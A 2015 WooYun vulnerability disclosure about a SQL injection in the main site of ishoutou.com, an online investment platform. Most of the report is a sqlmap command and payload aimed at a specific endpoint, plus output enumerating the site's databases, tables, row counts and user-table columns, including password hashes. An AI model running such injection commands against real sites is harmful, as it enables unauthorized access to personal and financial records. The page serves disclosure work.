当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161051

漏洞标题:手投网主站一处注入涉及数万用户信息(姓名\密码\交易密码\地区\手机号等)

相关厂商:北京手投网投资控股有限公司

漏洞作者: 路人甲

提交时间:2015-12-13 20:25

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

我听说老板发iPhone 6plus?
主站注入 另泄露商城数据库

详细说明:

注入:

python sqlmap/sqlmap.py -u "https://www.ishoutou.com/home/feedback/doDel" --data "idarr=updatexml(1,if(1=1*,1,0x22),1)" --dbms=mysql --technique=B --random-agent --threads=10 --current-user


sqlmap identified the following injection points with a total of 11 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [4]:
[*] ecshop2015
[*] information_schema
[*] mysql
[*] shoutouwang
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current database:    'shoutouwang'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: shoutouwang
[120 tables]
+-------------------------------+
| lzh_9yue                      |
| lzh_acl                       |
| lzh_activity_diy              |
| lzh_activity_diy_log          |
| lzh_ad                        |
| lzh_applylog                  |
| lzh_area                      |
| lzh_article                   |
| lzh_article_area              |
| lzh_article_category          |
| lzh_article_category_area     |
| lzh_auser_dologs              |
| lzh_ausers                    |
| lzh_auto_borrow               |
| lzh_bank_list                 |
| lzh_borrow_info               |
| lzh_borrow_info_lock          |
| lzh_borrow_investor           |
| lzh_borrow_tip                |
| lzh_borrow_verify             |
| lzh_borrow_vouch              |
| lzh_comment                   |
| lzh_current_info              |
| lzh_current_investor          |
| lzh_donate                    |
| lzh_enterprise                |
| lzh_face_apply                |
| lzh_feedback                  |
| lzh_friend                    |
| lzh_friend_copy               |
| lzh_friend_copy1              |
| lzh_global                    |
| lzh_handler                   |
| lzh_hetong                    |
| lzh_homsuser                  |
| lzh_id5log                    |
| lzh_inner_msg                 |
| lzh_interface_token           |
| lzh_invest_credit             |
| lzh_invest_detb               |
| lzh_investor_detail           |
| lzh_izhubo                    |
| lzh_jifen_choujiang           |
| lzh_jubao                     |
| lzh_k_invest                  |
| lzh_k_loan                    |
| lzh_kvtable                   |
| lzh_llpayinfo                 |
| lzh_llpaylog                  |
| lzh_llpaypost                 |
| lzh_loan                      |
| lzh_market_address            |
| lzh_market_goods              |
| lzh_market_jifenlist          |
| lzh_market_log                |
| lzh_media                     |
| lzh_member_address            |
| lzh_member_alipay             |
| lzh_member_apply              |
| lzh_member_banks              |
| lzh_member_borrow_show        |
| lzh_member_contact_info       |
| lzh_member_creditslog         |
| lzh_member_data_info          |
| lzh_member_department_info    |
| lzh_member_ensure_info        |
| lzh_member_financial_info     |
| lzh_member_friend             |
| lzh_member_house_info         |
| lzh_member_info               |
| lzh_member_integrallog        |
| lzh_member_limitlog           |
| lzh_member_login              |
| lzh_member_money              |
| lzh_member_moneylog           |
| lzh_member_msg                |
| lzh_member_ou                 |
| lzh_member_payonline          |
| lzh_member_remark             |
| lzh_member_safequestion       |
| lzh_member_to                 |
| lzh_member_withdraw           |
| lzh_member_yott               |
| lzh_members                   |
| lzh_members_status            |
| lzh_name_apply                |
| lzh_navigation                |
| lzh_oauth                     |
| lzh_payment_log               |
| lzh_promote                   |
| lzh_promote_other             |
| lzh_qq                        |
| lzh_recommendlog              |
| lzh_redbag                    |
| lzh_redbag_list               |
| lzh_rongzi                    |
| lzh_sendlog                   |
| lzh_shares_additional         |
| lzh_shares_apply              |
| lzh_shares_global             |
| lzh_shares_holiday            |
| lzh_shares_lever              |
| lzh_shares_rateconfig         |
| lzh_shares_record             |
| lzh_shares_supply             |
| lzh_shares_type               |
| lzh_smslog                    |
| lzh_sys_tip                   |
| lzh_tmplog                    |
| lzh_today_reward              |
| lzh_transfer_borrow_info      |
| lzh_transfer_borrow_info_lock |
| lzh_transfer_borrow_investor  |
| lzh_transfer_detail           |
| lzh_transfer_investor_detail  |
| lzh_verify                    |
| lzh_video_apply               |
| lzh_vip_apply                 |
| lzh_yott_log                  |
| lzh_yott_money_log            |
+-------------------------------+
Database: shoutouwang
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| lzh_tmplog                | 136820  |
| lzh_member_moneylog       | 115837  |
| lzh_sendlog               | 85064   |
| lzh_member_login          | 84250   |
| lzh_redbag_list           | 40000   |
| lzh_inner_msg             | 38826   |
| lzh_auser_dologs          | 36153   |
| lzh_members               | 34000   |
| lzh_members_status        | 33195   |
| lzh_member_info           | 32846   |
| lzh_member_money          | 26282   |
| lzh_activity_diy_log      | 18592   |
| lzh_investor_detail       | 18396   |
| lzh_member_payonline      | 15986   |
| lzh_llpaylog              | 11644   |
| lzh_borrow_investor       | 11267   |
| lzh_name_apply            | 10035   |
| lzh_member_integrallog    | 9857    |
| lzh_interface_token       | 7637    |
| lzh_yott_log              | 7381    |
| lzh_member_banks          | 6470    |
| lzh_member_creditslog     | 5008    |
| lzh_member_ou             | 4973    |
| lzh_member_withdraw       | 4511    |
| lzh_area                  | 3412    |
| lzh_llpaypost             | 3333    |
| lzh_promote_other         | 2282    |
| lzh_id5log                | 1722    |
| lzh_llpayinfo             | 1334    |
| lzh_recommendlog          | 801     |
| lzh_member_yott           | 529     |
| lzh_borrow_info           | 464     |
| lzh_borrow_info_lock      | 464     |
| lzh_borrow_verify         | 464     |
| lzh_yott_money_log        | 451     |
| lzh_activity_diy          | 433     |
| lzh_article               | 330     |
| lzh_verify                | 215     |
| lzh_member_limitlog       | 210     |
| lzh_today_reward          | 129     |
| lzh_promote               | 84      |
| lzh_auto_borrow           | 80      |
| lzh_member_to             | 46      |
| lzh_global                | 38      |
| lzh_article_category_area | 30      |
| lzh_article_category      | 29      |
| lzh_navigation            | 27      |
| lzh_bank_list             | 21      |
| lzh_ausers                | 19      |
| lzh_applylog              | 12      |
| lzh_izhubo                | 12      |
| lzh_shares_global         | 12      |
| lzh_media                 | 11      |
| lzh_ad                    | 10      |
| lzh_acl                   | 9       |
| lzh_friend                | 8       |
| lzh_friend_copy           | 6       |
| lzh_friend_copy1          | 6       |
| lzh_qq                    | 5       |
| lzh_shares_lever          | 5       |
| lzh_shares_rateconfig     | 5       |
| lzh_vip_apply             | 5       |
| lzh_shares_type           | 4       |
| lzh_9yue                  | 1       |
| lzh_redbag                | 1       |
+---------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: shoutouwang
Table: lzh_members
[30 columns]
+-----------------+------------------------+
| Column          | Type                   |
+-----------------+------------------------+
| active_integral | int(15)                |
| area            | int(10) unsigned       |
| city            | int(10) unsigned       |
| credits         | int(10)                |
| customer_id     | int(10) unsigned       |
| customer_name   | varchar(20)            |
| ent             | tinyint(1)             |
| id              | int(10) unsigned       |
| integral        | int(15)                |
| invest_credits  | decimal(15,2) unsigned |
| is_ban          | int(11)                |
| is_borrow       | int(2)                 |
| is_transfer     | int(2)                 |
| is_vip          | tinyint(3)             |
| last_log_ip     | char(15)               |
| last_log_time   | int(10)                |
| pin_pass        | char(32)               |
| province        | int(10) unsigned       |
| recommend_id    | int(10) unsigned       |
| reg_ip          | varchar(15)            |
| reg_time        | int(10) unsigned       |
| reward_money    | decimal(15,2)          |
| tid             | int(11)                |
| time_limit      | int(10) unsigned       |
| user_email      | varchar(50)            |
| user_leve       | tinyint(4)             |
| user_name       | varchar(50)            |
| user_pass       | char(32)               |
| user_phone      | varchar(11)            |
| user_type       | tinyint(3) unsigned    |
+-----------------+------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idarr=updatexml(1,if(1=1 AND 7378=7378,1,0x22),1)
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user:    'shoutouwang@%'


2.png


漏洞证明:

以证明 不深入

修复方案:

升级

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评价

  1. 2015-12-13 20:32 | 浩天 认证白帽子 ( 核心白帽子 | Rank:925 漏洞数:80 | 哈!躁起来!)

    吹过的NB要兑现了

  2. 2015-12-13 20:34 | JiuShao ( 普通白帽子 | Rank:438 漏洞数:99 | ╮(╯▽╰)╭锄禾日当午)

    吹过的NB要兑现了